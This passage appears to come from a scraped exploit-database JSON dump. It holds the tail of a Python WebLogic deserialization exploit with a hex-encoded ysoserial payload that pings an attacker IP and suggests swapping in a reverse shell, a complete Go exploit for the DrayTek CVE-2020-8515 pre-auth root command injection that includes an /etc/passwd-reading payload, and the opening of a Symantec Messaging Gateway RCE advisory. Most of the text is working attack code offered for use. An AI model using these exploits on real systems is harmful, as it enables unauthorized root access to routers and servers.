\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n \r\n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out\r\n#len(payload) is xxxx bytes\r\n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target.\r\n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload.\r\n \r\n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)\r\nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\"\r\n \r\n \r\nchunk3 = '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\r\n \r\ntotallength = len(chunk1) + len(chunk2) + len(chunk3)\r\nprint \"[+]TOTAL payload length: \", totallength\r\n \r\n#Update the TOTAL payload length in Chunk1\r\nlen_hex = hex(totallength)\r\nprint \"[+]Payload length in HEX: \", len_hex\r\nlen_hex = len_hex.replace('0x', '0')\r\nprint \"[+]Payload length in HEX: \" , len_hex\r\n \r\ns1 = len_hex[:2]\r\ns2 = len_hex[2:4]\r\nlen_hex = unhexlify(s1 + s2)\r\n \r\nprint \"[+]Payload length in HEX now: \", len_hex\r\n \r\n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)\r\nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\"\r\n \r\nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n#print \"[+]Updated 'chunk1' : \\n\", chunk1\r\n \r\n#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1'\r\npayload = chunk1 + chunk2 + chunk3\r\n \r\n#Adjust header for appropriate message length\r\npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\r\nprint '[+]Sending payload...'\r\nsock.send(payload)\r\n \r\nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\"\r\nprint(\"\\n[+]Response to Request#: \\n\")\r\nresponse = sock.recv(15000)\r\nprint(response)\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28661", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-12-19T19:21:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "DrayTek Products - Pre-authentication Remote Root Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34170", "href": "https://0day.today/exploit/description/34170", "sourceData": "package main\n\n\n/*\nCVE-2020-8515: DrayTek pre-auth remote root RCE\nMon Mar 30 2020 - 0xsha.io\nAffected:\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,\nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,\nand 1.4.4_Beta\nYou should upgrade as soon as possible to 1.5.1 firmware or later\nThis issue has been fixed in Vigor3900/2960/300B v1.5.1.\nread more :\nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html\nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\nhttps://thehackernews.com/2020/03/draytek-network-hacking.html\nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/\nexploiting using keyPath\nPOST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: 1.2.3.4\nContent-Length: 89\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n */\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n)\n\nfunc usage() {\n\n\tfmt.Println(\"CVE-2020-8515 exploit by @0xsha \")\n\tfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" )\n\tfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" )\n}\n\nfunc main() {\n\n\n\tif len(os.Args) < 3 {\n\t\tusage()\n\t\tos.Exit(-1)\n\t}\n\n\ttargetUrl := os.Args[1]\n\t//cmd := \"cat /etc/passwd\"\n\tcmd := os.Args[2]\n\n\n\t// payload preparation\n\tvulnerableFile := \"/cgi-bin/mainfunction.cgi\"\n\t// specially crafted CMD\n\t// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n\tpayload :=`'\n\t/bin/sh -c 'CMD'\n\t'`\n\tpayload = strings.ReplaceAll(payload,\"CMD\", cmd)\n\tbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\")\n\n\t//PostForm call url encoder internally\n\tresp, err := http.PostForm(targetUrl+vulnerableFile ,\n\t\turl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} })\n\n\tif err != nil{\n\t\tfmt.Println(\"error connecting host\")\n\t\tos.Exit(-1)\n\t}\n\n\n\tdefer resp.Body.Close()\n\tbody, err := ioutil.ReadAll(resp.Body)\n\t\n\tif err != nil{\n\t\tfmt.Println(\"error reading data\")\n\t\tos.Exit(-1)\n\t}\n\t\n\tfmt.Println(string(body))\n\n}\n", "sourceHref": "https://0day.today/exploit/34170", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-04T21:32:34", "description": "Exploit for jsp platform in category web applications", "cvss3": {}, "published": "2017-08-19T00:00:00", "type": "zdt", "title": "Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6327"], "modified": "2017-08-19T00:00:00", "id": "1337DAY-ID-28326", "href": "https://0day.today/exploit/description/28326", "sourceData": "This is an advisory for CVE-2017-6327 which is an unauthenticated remote\r\ncode execution flaw in the web interface of Symantec Messaging Gateway\r\nprior to and including version 10.6.3-2, which can be used to execute\r\ncommands as root.\r\n \r\nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based\r\nanti-spam/security product for e-mail servers. It is deployed as a physical\r\ndevice or with ESX in close proximity to the servers it is designed to\r\nprotect.\r\n \r\n=*=*=*=*=*=*=*=*= TIMELINE\r\n \r\n2017-07-07: Reported to Symantec\r\n2017-08-10: Patch and notice released by Symantec [1]\r\n2017-08-18: Public technical advisory\r\n \r\n=*=*=*=*=*=*=*=*= DESCRIPTION\r\n \r\n- Bug #1: Web authentication bypass\r\n \r\nThe web management interface is available via HTTPS, and you can't do much\r\nwithout logging in.\r\n \r\nIf the current session (identified by the `JSESSIONID` cookie) has the\r\n`user` attribute set, the session is considered authenticated.\r\n \r\nThe file LoginAction.class defines a number of public methods and they can\r\nall be reached via unauthenticated web requests.\r\n \r\nBy making a GET request to `/brightmail/action1.do?method=method_name` we\r\ncan execute `LoginAction.method_name` if `method_name` is a 